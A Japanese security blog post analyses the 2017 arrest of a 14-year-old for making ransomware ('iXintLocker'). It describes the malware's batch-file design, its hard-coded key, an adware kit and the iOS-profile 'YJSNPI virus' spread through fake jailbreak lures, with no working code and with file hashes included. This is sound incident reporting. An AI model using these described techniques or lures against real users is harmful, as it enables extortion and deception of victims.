尚、このランサムウェアは2017年5月に騒動となったランサムウェア「WannaCry」との関連はありません。

インシデントタイムライン

男子生徒のものと見られるTwitterアカウントと報道の時系列を整理すると次の通り。

日時出来事
2017年1月6日男子生徒と見られるTwitterアカウントがランサムウェアを作成したとツイート。
2017年1月7日男子生徒と見られるTwitterアカウントがランサムウェアを配布するとツイート。
2017年1月神奈川県警がサイバーパトロールを通じ男子生徒のTwitterアカウントを発見。
2017年4月神奈川県警が男子生徒の自宅を捜索。PCなどを押収。
2017年4月9日男子生徒と見られるTwitterアカウントのツイートが止まる。

報道されている事案概要

容疑者大阪府高槻市 中学3年生 男子生徒 14歳。
逮捕容疑不正指令電磁的記録作成、および不正指令電磁的記録保管の疑い。
2017年1月6日に自身の所有するPCを用いて、ランサムウェアを作成、保管した疑いがある。*1
ランサムウェアの作成に係る容疑で逮捕されたのは全国で初めて。*2
男子生徒は「間違いありません」と容疑を認めている。
動機取り調べに対して自分の知名度を上げたかったなどと供述。
他供述他報じられている男子生徒の供述
「力試しに作ってみたら出来た」*3
「少なくとも100件以上ダウンロードされた」
「自分のPCで約3日間で完成した」*4
(ランサムウェアの作成は)「独学した」*5
「小学生のころにパソコン(PC)教室に参加したのがきっかけでのめり込んだ」*6
その他事案に関して報じられている状況
捜査にあたった神奈川県警の対応
男子生徒が作成したランサムウェアの概要

以下はこれらの報道を元にpiyokangoが確認した内容です。

男子生徒が利用していたとみられるオンラインサービス

逮捕された男子生徒はいくつかのSNS等のサービスを利用していた可能性がある。piyokangoが確認した男子生徒が利用していたとみられるサービスは次のもの。

この他にオンラインストレージ(Google Drive、MediaFire)の利用やWebサイトも設置していたとみられる。

以降は関連する人物を「作成者」と記述する。

Twitterを通じて公開されたランサムウェア

作成者のTwitterアカウントは1月6日、7日にランサムウェアに関連する投稿を行っている。産経新聞では「自由に使って」というコメントあったと報じられているが、少なくともランサムウェアに直接関係のあるこの2つの投稿には「自由に」との表現は確認できなかった。

Twitterに投稿された日付投稿内容
2017年1月6日15時50分「ランサムウェア作ったったwwwwwwww」とツイート
Ransomwareが動作するシーンを録画し投稿。
2017年1月7日03時01分「さっきのランサムウェア配布 ↓をよく読んで、†悔い改めて†、どうぞ。↓」とツイート
MediaFire上にアップロードしたランサムウェア一式(ZIPファイル)のリンクを掲載。

リンクをクリックするとMediaFireに接続する。ランサムウェアが公開されていた場所は「海外の掲示板」と報じられていたが、実態としてはオンラインストレージサービスであった。MediaFire上では次のように誰でもダウンロードできる状態で公開されていた。

f:id:Kango:20170608133558p:image:w450

また、同名のファイルがGithub上にも保存されていたことを確認した。TwitterでGithubへのリンクを投稿するなどの直接的な誘導は2017年6月10日時点で確認できなかったが、Twitterのプロフィールに掲載されているWebページ(既に削除済み)上ではこのGithubで公開したファイルへリンクが張られていた。

f:id:Kango:20170610031107p:image

現在は関連するリポジトリが全て削除され404と表示される。(Githubアカウント自体は9日時点で停止されていない。)

f:id:Kango:20170610030940p:image:w450

またこのランサムウェアがダウンロードされた件数は「100件超」と報じられていたが、これはMediaFire上で表示される件数を指していたのではないかと見られる。ただし、何回もダウンロードすればそれだけカウントされることから100件という数字がそのままダウンロードした人数に合致するわけではない。(画像はpiyokangoが検証用にアップしたもの)

f:id:Kango:20170610160449j:image

ランサムウェア「iXintLocker」のファイル構成

ランサムウェア「ransomware.zip」は男子生徒の逮捕以前よりこの動きを把握していた人がこのファイルと思わしき情報(Virustotalのリンク)を投稿している。これを元にファイルを調査したところ、ransomware.zipは20個のファイルが含まれた圧縮ファイルであったことを確認した。

f:id:Kango:20170608140333p:image:w450

またランサムウェアは「iXintLocker」という呼称が用いられている。これは暗号化後に表示されるHTA形式ファイルのタイトルから確認出来る。「iXint」はTwitterや他サービスでハンドルネームにも使用されていた文字列の一部と同じである。

f:id:Kango:20170609164741p:image:w450

圧縮ファイルには「aescrypt.exe」、「openssl.exe」といったEXEファイルやDLLファイルが含まれている。これはインターネット上に公開されたソフトウェアをそのまま利用していたとみられる。「複数の無料の暗号化ソフトなどを組み合わせたもの」と報じられているが、これを差していたと見られる。

ZIPに含まれていた暗号化ソフト公開元
aescrypt.exeAES Crypt
(Windows 32bit向けコンソール版)
openssl.exe
libeay32.dll
libssl32.dll
OpenSSL for Windows

暗号化ソフトウェアをバッチファイルから呼び出すことでランサムウェアとして機能(暗号化や復号など)させる実装となっていた。

作成されたとみられるファイル概要
ransom.batランサムウェア本体。暗号化するバッチファイル。
他にrandom.batというファイルが存在するが、これにファイルを暗号化する機能をアドオンしたものとみられる。
TrendMicroによればStackOverflow上に一部同じコードが公開されていた模様
ransom - コピー.bat暗号化されたファイルを復号するためのバッチファイル。
alert.hta脅迫文を表示をするHTA形式ファイル。

Twitterに掲載されていたランサムウェアに関するFAQや免責事項

ランサムウェアの配布先リンクのTwitterへの投稿には、ランサムウェアに関するFAQ形式の概要説明と免責事項も掲載されていた。以下はその内容を引用したものである。

  • 安全なのですか?

はい、初期状態はね。暗号化されるのはこの中の「最重要機密」フォルダだけでそれ以外の暗号化は行いません。また警告を表示するhtaファイルもレジストリ等を残しません(ただソースコードを改変しほかのフォルダも暗号化したり警告をスタートアップにしたりできます)

  • iXintLockerをベースに作成されたランサムウェアを実行(あるいは実行させられ)必要なファイルが暗号化されてしまいました

マスター暗号鍵が変更させられていない場合、ransom(コピー).batに問い合わせコードを入力し、復号することが可能です。変更されている場合かつコンパイルされていない場合、マスター暗号鍵をソースコード中から確認が可能です。

コンパイルされていて暗号鍵が不明な場合、問い合わせコードを消失した場合、ファイルの復号化は不可能です。

  • ソースコードの改変方法を教えてください

お断りします。どこを書き換えるかくらい自分で探してください。それでも分からないのなら非難を浴びるでしょうが知恵袋にでも行って聞いてください

免責事項として、ダウンロードした人の使い方には一切関与しません。又、ファイルの復号化に関する問い合わせは受け付けません

iXintLockerの機能

Twitterに投稿されたFAQで概略が説明されているものは確認できたが、圧縮ファイルには使い方に関する情報(Readmeのようなファイル)は確認できなかった。

配布されていたランサムウェア「ransom.bat」を実行した際に確認できた機能は次のものであった。

暗号化の対象特定フォルダ(カレントフォルダに存在する「最重要機密」フォルダ)配下のファイル全てを暗号化する。
暗号化ファイルには元のファイル名に「.enc」といった拡張子が付与される。
暗号化の形式AES-256 bit
ファイルの暗号化はAES Crypt、AES CryptのカギはOpenSSLで暗号化される。
OpenSSLで使用されるカギはバッチファイル内にハードコードされている。
感染させる手段ターゲットに事前に「最重要機密」フォルダに暗号化されると影響があるファイルを格納してもらった後、暗号化に必要な関連ファイル一式をダウンロードしてもらい、バッチファイル「ransom.bat」を実行させる必要がある。

一連の処理はすべて実行した端末の中で行われ、外部のサーバーに接続することはしない。

金銭の受け渡しはAmazonギフト券を想定

実行後に表示されるHTAファイルにAmazonギフト券の要求する記述がされている。メールアドレスが示され、そこへ問い合わせ番号とされる情報とともにギフト券に関する情報を送る想定での記述と思われる。

連絡を受けた側が復号をするに際して、どのような対応をとるのかは説明がなく不明だが、先ほどの一式に含まれる「ransom - コピー.bat」は最初のファイル群には含めずに、支払を受けて引き渡す作りだったのかもしれない。但し「ransom.bat」にマスター暗号鍵がそのまま記述されており、復号バッチがなくとも暗号化されたファイルを復号することは可能であったと考えられる。(これはTrendMicroのBlogでも同様の説明がされている。)

インターネット上に公開されていた他の作成物

ランサムウェアの調査を通じて、作成者が他にもインターネット上に2つの作成物を公開していたことを確認した。具体的には次の2つである。

検索サイトのキャッシュからGithub上で次のようにまとめられていたことを確認できる。

f:id:Kango:20170610040956p:image:w450

これら2つの作成物についても調査した。

「アドウェア作成ソフト」の中身

アドウェア作成ソフトもiXintLocker同様にMediaFireやGithubに公開されていた。2016年11月には「クッソ昔に作ったアドウェア作成ソフト(Windows向け)を発掘したから配布しますwwwww作り方は内封のReadmeを読んでください(中略)間違えて自分で実行したりして消せなくなっても保証しません。(ていうか動作するかすら怪しい) 」と投稿されていた。

圧縮ファイルの中には4つのファイルが含まれていた。広告を埋め込んだHTA形式のファイルをスケジュールにて起動させるといったシンプルな実装で名前の通りアドウェアとして機能するものと見られる。バッチファイル、HTA形式ファイルといった組み合わせはiXintLockerと同じ流れを汲んでいる。

f:id:Kango:20170610032653p:image

ランサムウェアとは違いアドウェア作成ソフトの圧縮ファイルには「作り方.txt」が含まれ、このテキストには使い方や感染させた後の除去ツールの作り方も記述されていた。

f:id:Kango:20170610032541p:image

「アドウェア作成ソフト」のファイルの更新日時は2015年11月17日となっていた。Twitterに残っていた投稿の内、最も古いものは2016年11月24日であり、これの1年以上前である。

「YJSNPIウイルス」とは何か

もう1つの作成物「YJSNPIウイルス」はiPhone向けに作成されたウイルスとして撒かれていたもの。「野獣先輩ウイルス」とも呼ばれている。感染するとiPhoneのメニュー画面上に大量の人の顔のアイコンが作成される。また、作成されたアイコンは削除することが出来なくなる。実態はiOSのプロファイルを悪用したものであり、これをインストールすることで事象が発生する。

YJSNPIウイルスに関しては、感染後の様子を収めた動画など多くの情報がインターネット上に公開されており、被害を受けた人もいるとみられる。また感染後の様子が派手であることから興味本位で感染した人もいた模様。

YJSNPIウイルスはどのように撒かれていたか

プロファイルをダウンロードさせるページをそれらしい作りにしていただけでなく、ここへ誘導するために複数の方法がとられていた模様。Twitterでも「オワリィ。知恵袋とYoutubeでまた地道に広めるかぁ」といった投稿がされている。

YJSNPIウイルス(プロファイル)の配布元

それらしい見栄えで作成されたサイトで、ダウンロードを押すとプロファイルが端末にダウンロードされたと見られる。

f:id:Kango:20170610155727p:image:w450

リンク先はGoogle Driveとなっているが、既に消されているためか404と表示される。

f:id:Kango:20170610155723p:image:w320

知恵袋での拡散

Yahoo!Japanの知恵袋でこのウイルスに関する情報が多数投稿されている。被害を受けたために支援を求める書き込みだけでなく、プロファイルを撒いているサイトへ「iOSの脱獄が出来る」等と誘導する書き込みも見られる。愉快犯的に第三者がこのサイトのURLを紹介する書き込みもあったようだ。

プロファイル配布サイトへ誘導している事例

上記のサイトに行きDownload iXintpwnを押します。適当にインストールを進めると再起動を求められるので再起動してください。再起動後ホーム画面にCydiaがあるはずです

https://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q12166371457

ここのサイトからiGGがインストールできます。下の青いボタンを押してインストールを何度か押してください。あとは他のサイトに書いてある方法と同じのが使えます。

https://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q14171192659

このサイトでXmodGamesの下にある青いボタンを押してください。

しばらく待つとインストール画面が表示されますから進めてください。

混雑していてインストール画面が出るまで結構かかります。あと時間帯を変えてみると早く終わるかも

https://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q11171497771

はい可能です。このサイトから

:

iggのほうの下の青いボタンを押して読み込みが終わるまで待ってください(1~2分程度読み込みに時間がかかります)

そしてインストール画面が出たらインストールを何回か押します。そうするとインストールできます

https://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q11171757171

また知恵袋上で作成者とやり取りをしているように見受けられる投稿も確認した。

Youtubeに偽のJailBreak動画を掲載

Youtube上にJailBreakが出来るかのように誤認させる動画を投稿し、「YJSNPIウイルス」のインストールへ誘導する方法もとられていた。

f:id:Kango:20170610045644p:image:w450

動画の通りにやったところJailBreakが出来たかのような好意的なコメントも並んでいる。

f:id:Kango:20170610045641p:image

「YJSNPIウイルス」の被害を受けたとみられる人と同じアイコンでYoutube側に成功したと何故かポジティブな書き込みが行われていた。

f:id:Kango:20170610050700p:image

f:id:Kango:20170610050657p:image

第三者拡散しているケースも

Twitterでは第三者拡散している事例もある。

f:id:Kango:20170610051647p:image:w360

知恵袋でも似たような事象が散見される。これはすべて同じアカウントによる投稿だが、これが作成者なのか第三者なのかは不明である。

f:id:Kango:20170612011433p:image:w360

作成者がYJSNPIウイルスの作成方法や削除ツールを公開?

作成手順としてYJSNPIウイルスのプロファイルの作成方法が紹介されている。またこれの作成代行を有償にて受け付けるといった記述もあった。

f:id:Kango:20170610161900p:image:w450

また、リンク先は既に消されているため詳細は不明だが、「めんどくさいので削除パッチを永久公開することにしました。」と削除ツールを公開していたと見られる痕跡も確認した。プロファイルをインストールしてしまった人に対して「おめでとうございます」等と都度関与していたとみられることから復旧手段の問い合わせも複数受けていたのではないかと見られる。

f:id:Kango:20170610155002p:image:w450

YJSNPIウイルスは何のために作成したのか

作成者へインタビューしたという記事が公開されいてる。

作成した目的について問われたところ、次のように回答していた。

僕: なぜiXintpwnを作成したのかまずはお聞かせ願えますでしょうか。

Y氏: なんの知識も持たずに脱獄しようとしている方がどのくらい引っかかるのか興味があり、また脱獄して調子に乗っている、チートばかりするようなダメなお子さんがうざったかったからです

https://otya.me/tech/iphone/ixintpwn-notice/

付録

iXintLocker (ランサムウェア)
FilesSHA-256
ransomware.zip1de430b9e2a508381f3f0e0b0681e97f1203de08eab32d0168ef52e28092954e
random.batb946a22702fd87891503c28e0d6272f2138fec41ef4f37c5a14aaf0eea378db4
randsom.bat0e237bc8bc978e2d5ce4da2dfc9e4f9ed834fb4274af76d2756987f2f4a4605b
ransom - コピー.bat118d745d5331b84d998a687f7f9cc81b3fc1f3d2fcbe7c11aeb044b6bedf5b77
alert.htabc87fae9271603ce18d57ded0aac5f6657eaf6b0a8068e2bbf38e811e42e715a
アドウェア作成ソフト
FilesSHA-256
adware.zip5d4ae4bf1cefbcf2bc437876382fd5a0be056fad3170dde61f7ae239654b9fe6
install.bat5c6d4a8646be65983d2067aefcbabe1e72c27f201068b653c38743fa518ffa3d
作り方.txt18f31bf6c66f5948fd25ccd53d3622c91a02052e9d63ac0b3a16d36526875ef5
ad.hta9f2f81bf4ca6b46708ddc0f92acee93cf798c5fcc4b471401899cf30be1baee4

更新履歴

*1:中3が身代金ウイルス 全国初、作成の疑いで逮捕,日本経済新聞,2017年6月5日夕刊

*2:身代金ウイルス中3逮捕 作成容疑全国初,読売新聞,2017年6月5日夕刊

*3:中3、身代金ウイルス作成容疑,朝日新聞,2017年6月5日夕刊

*4:「ダウンロードは100件」身代金ウイルス作成 容疑の中3供述,2017年6月6日朝刊

*5:中3、ウイルス作成「独学」身代金要求型「3日で」容疑供述,朝日新聞,2017年6月6日朝刊

*6:ランサムウェア 中3「独学、3日間で」「有名になりたくて」作成容疑,毎日新聞,2017年6月6日朝刊

*7:「3日でウイルス作成」逮捕の中3 無料ソフト使用,日本経済新聞,2017年6月6日朝刊

*8:ウイルス「ランサムウェア」作成容疑 中3逮捕,毎日新聞,2017年6月5日夕刊

*9:身代金ウイルス作成容疑 中3男子を逮捕,東京新聞,2017年6月5日夕刊

Kango
Kango

piyokangoの日記。備忘録。